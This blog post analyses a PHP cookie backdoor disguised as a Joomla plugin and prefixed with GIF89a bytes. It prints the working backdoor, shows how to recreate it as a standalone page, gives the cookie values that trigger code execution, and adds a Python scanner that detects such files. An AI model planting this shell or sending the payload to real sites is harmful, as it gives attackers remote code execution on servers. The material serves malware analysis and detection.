PHP -- cookie backdoor
阿新 • Published: 2019-01-29
http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html
```php
GIF89a
<?php
/**
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 *
 * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved.
 * @license     GNU General Public License version 2 or later
 */

/**
 * Instant Suggest Ajax
 *
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 * @since       3.1
 */
class PlgSystemInstantSuggest
{
    public function __construct() {
        // p3 carries the name of the function used to decode the other two cookies
        $filter = @$_COOKIE['p3'];
        if ($filter) {
            $option = $filter(@$_COOKIE['p2']); // decoded function name
            $auth = $filter(@$_COOKIE['p1']);   // decoded code string
            // With the /e modifier the replacement ($auth) is evaluated as PHP code
            $option("/123/e",$auth,123);
            die();
        }
    }
}
```
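Using part of the code above, create the page bk-001.php:

```php
<?php
// Same logic as the plugin constructor, without the class wrapper
$filter = @$_COOKIE['p3'];
if ($filter) {
    $option = $filter(@$_COOKIE['p2']);
    $auth = $filter(@$_COOKIE['p1']);
    $option("/123/e",$auth,123);
    die();
}
?>
```

Send the following cookie values: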
Cookie: p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==
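p3=base64_decode;
p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;
p1=base64_decode("cGhwaW5mbygpOw==") --------> p1=phpinfo();
Some readers may prefer to use the base64 program on Linux, for example:
echo preg_replace | base64
The result is cHJlZ19yZXBsYWNlCg==, which prevents the code above (phpinfo();) from executing, because echo appends a newline (0x0a) that ends up inside the encoded value. It is recommended to use the php_encode function to encode the string.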
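
Seen from the defending side, the two listings above share three traits that can be checked without executing the file: image magic bytes ahead of `<?php`, a call through a variable filled from a request superglobal, and a regex literal carrying the /e modifier. The Python scanner below is an added example, not part of the original post or the linked write-ups; `scan_php` and the benign sample are hypothetical names and constructed inputs, and the checks are line-based heuristics rather than a PHP parser.

```python
import re

SUPERGLOBAL = re.compile(r"\$_(?:COOKIE|GET|POST|REQUEST)\b")
ASSIGN = re.compile(r"(\$\w+)\s*=(?![=>])([^;]*);")
VAR_CALL = re.compile(r"(\$\w+)\s*\(")
# Quoted regex literal whose trailing modifiers include "e", e.g. "/123/e".
E_REGEX = re.compile(r"""(["'])([^\w\s\\])(?:(?!\2|\1).)*\2[A-Za-z]*e[A-Za-z]*\1""")
IMAGE_MAGIC = (b"GIF89a", b"GIF87a", b"\x89PNG", b"\xff\xd8\xff")

def scan_php(source: bytes) -> list[tuple[int, str]]:
    """Return (line number, finding) pairs for one PHP file (line-based heuristic)."""
    findings = []
    if source.lstrip().startswith(IMAGE_MAGIC) and b"<?php" in source:
        findings.append((1, "image magic bytes in front of PHP code"))
    tainted = set()  # variables whose value derives from request data
    for lineno, line in enumerate(source.decode("utf-8", "replace").splitlines(), 1):
        # A call through a tainted variable lets the request choose the function.
        for var in VAR_CALL.findall(line):
            if var in tainted:
                findings.append((lineno, f"call through request-controlled {var}"))
        m = ASSIGN.search(line)
        rhs = m.group(2) if m else ""
        if SUPERGLOBAL.search(rhs) or tainted & set(re.findall(r"\$\w+", rhs)):
            tainted.add(m.group(1))
        # The callee name is not in the file, so match the /e pattern literal itself.
        if E_REGEX.search(line):
            findings.append((lineno, "regex literal with /e (eval) modifier"))
    return findings

# Sample inputs: the bk-001.php shape from this page, and a constructed benign file.
SAMPLE_BACKDOOR = rb"""GIF89a
<?php
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
"""
SAMPLE_BENIGN = rb"""<?php
$name = htmlspecialchars($_GET['name']);
echo preg_replace("/\s+/", " ", $name);
"""

if __name__ == "__main__":
    for lineno, finding in scan_php(SAMPLE_BACKDOOR):
        print(f"line {lineno}: {finding}")
```

Because the function name arrives in a cookie, a search of the file for `preg_replace` or `eval` finds nothing; the variable-call and /e checks are the ones that flag it.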